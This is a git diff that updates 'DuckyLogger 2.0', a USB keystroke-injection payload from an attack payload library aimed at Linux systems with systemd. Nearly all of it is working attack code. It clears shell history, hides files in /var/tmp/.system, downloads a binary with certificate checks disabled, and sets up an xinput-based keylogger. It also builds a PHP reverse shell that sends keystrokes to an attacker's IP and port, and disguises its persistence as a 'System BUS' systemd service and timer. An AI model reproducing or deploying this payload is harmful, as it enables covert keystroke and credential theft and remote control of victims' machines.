diff --git a/payloads/library/credentials/DuckyLogger2/payload.txt b/payloads/library/credentials/DuckyLogger2/payload.txt index 0cc4650ea..1d8fb2b0e 100644 --- a/payloads/library/credentials/DuckyLogger2/payload.txt +++ b/payloads/library/credentials/DuckyLogger2/payload.txt @@ -1,6 +1,6 @@ REM Title: DuckyLogger 2.0 REM Description: Keylogger which sends each and every keystroke of the target remotely/locally. -REM AUTHOR: drapl0n +REM Author: drapl0n REM Version: 2.0 REM Category: Credentials REM Target: Unix-like operating systems with systemd. @@ -9,66 +9,111 @@ REM Attackmodes: HID REM [Note] REM Visit https://github.com/drapl0n/DuckyLogger2/README.md for usage and other important instructions. +REM REQUIRED IP and Port for listener +DEFINE #IPADDR 0.0.0.0 +DEFINE #PORT 4444 + +REM REQUIRED URL to download xinput binary - example: https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true +DEFINE #BINARY_URL example.com + +REM How long to wait for download to complete +DEFINE #DOWNLOAD_DELAY 2500 + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +REM Do not continue to execute on windows +IF ($_OS == WINDOWS) THEN + LED_R + ATTACKMODE OFF + STOP_PAYLOAD +END_IF + REM [keeping tracks clear] DELAY 500 -CTRL-ALT t +CTRL ALT t DELAY 400 -STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE -ENTER +STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE DELAY 100 REM [creating key logging mechanism] -STRING mkdir /var/tmp/.system -ENTER +STRINGLN mkdir /var/tmp/.system DELAY 100 -STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys -ENTER +STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys DELAY 100 -STRING chmod +x /var/tmp/.system/sys -ENTER +STRINGLN chmod +x /var/tmp/.system/sys DELAY 100 REM [importing xinput] -STRING cd /var/tmp/.system/ -ENTER +STRINGLN cd /var/tmp/.system/ DELAY 100 -STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true -ENTER -DELAY 2500 -STRING chmod +x xinput -ENTER +STRINGLN wget --no-check-certificate --content-disposition #BINARY_URL +DELAY #DOWNLOAD_DELAY +STRINGLN chmod +x xinput DELAY 100 REM [creating reverse shell] -STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus -ENTER +STRINGLN echo -e "while :\ndo\n\tping -c 5 #IPADDR\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"#IPADDR\",#PORT);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus DELAY 100 -STRING chmod +x /var/tmp/.system/systemBus -ENTER +STRINGLN chmod +x /var/tmp/.system/systemBus DELAY 100 REM [creating systemd service to execute payload on boot] -STRING mkdir -p ~/.config/systemd/user -ENTER +STRINGLN mkdir -p ~/.config/systemd/user DELAY 200 -STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service -ENTER +STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service DELAY 100 REM [creating systemd timer unit] -STRING echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer -ENTER +STRINGLN echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer DELAY 100 REM [enabling service] -STRING systemctl --user daemon-reload -ENTER +STRINGLN systemctl --user daemon-reload DELAY 300 -STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer -ENTER +STRINGLN systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer DELAY 150 -STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer -ENTER +STRINGLN systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer DELAY 150 -STRING exit -ENTER +STRINGLN exit +